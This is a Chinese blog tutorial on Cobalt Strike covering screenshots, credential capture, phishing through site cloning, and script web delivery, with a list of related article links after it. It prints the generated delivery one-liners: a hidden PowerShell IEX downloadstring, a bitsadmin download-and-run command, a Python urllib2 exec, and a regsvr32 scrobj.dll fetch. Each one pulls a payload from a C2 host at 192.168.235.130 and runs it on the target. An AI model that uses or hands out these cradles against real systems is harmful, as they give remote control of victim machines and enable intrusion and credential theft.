cobaltstrike 常用功能使用(下)

简介: cobaltstrike 常用功能使用

4.6 屏幕截图

640.png

4.7 凭证信息

640.png

5. 钓鱼攻击

640.png

5.1 克隆网站

640.png

5.2 下载文件

选择一个恶意文件直接加载,下载的时候会下载该文件。

640.png

5.3 脚本web传递

5.3.1 powershell

640.png

生成的脚本如下

powershell.exe -nop -w hidden -c "IEX((new-objectnet.webclient).downloadstring('http://192.168.235.130:80/a'))"

直接在目标机器上执行该脚本

640.png

上线

640.png

5.3.2 bitsadmin

640.png

生成的脚本如下所示:

cmd.exe /c bitsadmin /transfer 5cc3 http://192.168.235.130:80/b %APPDATA%\5cc3.exe&%APPDATA%\5cc3.exe&del%APPDATA%\5cc3.exe

在目标机器上执行该脚本

640.png

上线

640.png

5.3.3 Python

640.png

生成的Payload如下:

python -c "import urllib2; exec urllib2.urlopen('http://192.168.235.130:80/c').read();"

在目标服务器上执行该脚本

640.png

5.3.4 Regsrv32

640.png

生成脚本如下:

regsvr32 /s /n /u /i:http://192.168.235.130:80/e scrobj.dll

5.4 信息收集

640.png

640.png

5.4.1 实践

直接访问http://192.168.235.130就可以收集主机相关信息

访问以后,收集到的信息如下所示:

640.png

5.4.2 原理

分析生成网站的源码发现,其在网站源代码里植入了JS脚本,相应脚本如下所示:

640.png

相关文章
|
Java Python
burpsuite安装sqlmap模块---神器合一
今天有点时间,赶紧记录一个坑!哈哈... 都知道burpsuite是web渗透神器,里面不仅模块功能集成好用,而且可以自定义安装扩展模块, 当然牛人也可以自己写一个模块与其对接,这个对于我来说来说目前是望尘莫及 今天要记录的是burp扩展安装sqlmapapi,废话不多说,开始教程 step1.
2030 0
|
26天前
|
SQL 数据采集 安全
Burpsuite测试神器使用
Burpsuite测试神器使用
|
6月前
|
网络协议 测试技术 Windows
Switchhosts工具的使用
Switchhosts工具的使用
140 0
|
6月前
|
监控 安全 网络安全
火绒安全的用法
火绒安全的用法
|
6月前
|
数据安全/隐私保护
Cobaltstrike系列(一)-- 远程控制
Cobaltstrike系列(一)-- 远程控制
94 0
|
12月前
|
小程序 程序员 开发工具
微信web开发者工具无法打开的六种解决方法
微信web开发者工具无法打开的六种解决方法
887 0
|
网络安全 数据安全/隐私保护
MAC使用Charles,代理后,部分网页无法打开解决方法
关闭charles,重新打开,可正常访问日常网站。访问时,提示:您的连接不是私密连接,多半是因为,MAC系统未安装charles证书导致,解决方法如下: 1. 打开Charles,选择Help->SSL Proxy→Install Charles Root Certificate 2. 在弹出的添加证书窗口中,选择添加,可以看到在钥匙串访问窗口中,该证书已成功添加,但是此时该证书仍然不被信任 3.双击此证书,在弹出的Charles Proxy CA窗口中,点击信任按钮,使用此证书时,选择始终信任后关闭窗口,使用账号和密码授权后,即可看到此证书已经被信任了。。。
5417 0
MAC使用Charles,代理后,部分网页无法打开解决方法
|
安全 网络协议 Java
|
存储 安全 API
Cobaltstrike4.0——记一次上头的powershell上线分析(二)
Cobaltstrike4.0——记一次上头的powershell上线分析
375 0
|
Linux Go 网络架构
【工程】-内网调式神器-ngrok
【工程】-内网调式神器-ngrok
【工程】-内网调式神器-ngrok